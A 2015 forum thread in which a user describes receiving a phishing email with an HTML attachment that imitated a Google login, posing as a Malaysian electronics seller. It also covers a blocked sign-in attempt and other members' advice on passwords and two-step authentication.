Warning Sky Box Malaysia

[Anthony5]

Yesterday I received an email from Addstore88 at gmail.com.

Addstore88 is an online website in Malaysia that sells Skyboxes and other electronic appliances, and I had contacted them about 6 months ago for a Skybox. At that time they had replied to me that they didn't have stock of the requested item, so they were more or less a trusted site for me. You can do a search for Addstore88 and you will find their website

Yesterday I received an email with the subject RE: payment info, so I thought they informed me about the current stock.

The message read like, Please check payment info and confirm asap. Attached was a HTML file.

When I opened the file with Firefox I got to a Google page that asked me to login to my email. I logged in with another email than the one I received the message, and ended up in my inbox.

Next I saved the file and changed it to a TXT file so that I was able to open it with Notepad2, but the result was a large file with only digits.

I thought maybe they had sent a wrong file, but didn't reply because I don't need the item anymore.

This morning when I woke up there was a message in my email that Google had prevented a suspicious login to the email address I had used to view the message, about an hour after I had received the email.

The login had occurred from Malaysia

We prevented the sign-in attempt in case this was a hijacker trying to access your account. Please review the details of the sign-in attempt:

Monday, June 22, 3:19 AM GMT+8
IP Address: 124.82.28.219
Location: Puchong, Selangor, Malaysia

Edited June 22, 2015 by Anthony5

[RichCor]

I hope you've changed that google email password, maybe even enabled 2-step authentication on the account if it's an important mail box.

Maybe their website or email account was compromised, and now someone's going through their old correspondence looking for wealthier marks.

Attack vectors are a changing.

[Anthony5]

I hope you've changed that google email password, maybe even enabled 2-step authentication on the account if it's an important mail box.

Maybe their website or email account was compromised, and now someone's going through their old correspondence looking for wealthier marks.

Attack vectors are a changing.

Yeah have changed my password straight away.

By the way, now you have 1 password for all your Google accounts.

Edit

Ooops, seems not.

Only the password from my main account was changed, and the one they tried to log in still has the same password. Changed now.

However I saw a message the other day that you could have a single password for all your google accounts. Will have to look it up.

Edited June 22, 2015 by Anthony5

[KittenKong]

Never click on links in emails without first checking where they lead.

[Anthony5]

Never click on links in emails without first checking where they lead.

It was no link, but an HTML file

[RichCor]

Never click on links in emails without first checking where they lead.

It was no link, but an HTML file

Some sites will use enclose HTML formatted documents because they're quicker to generate on the server side code when you want to send someone a formatted invoice or notice.

One of the current attack vectors is emailing HTML with inline base64 binary files. No way to know what they are unless you open them up in an offline editor (or offline sandboxed browser).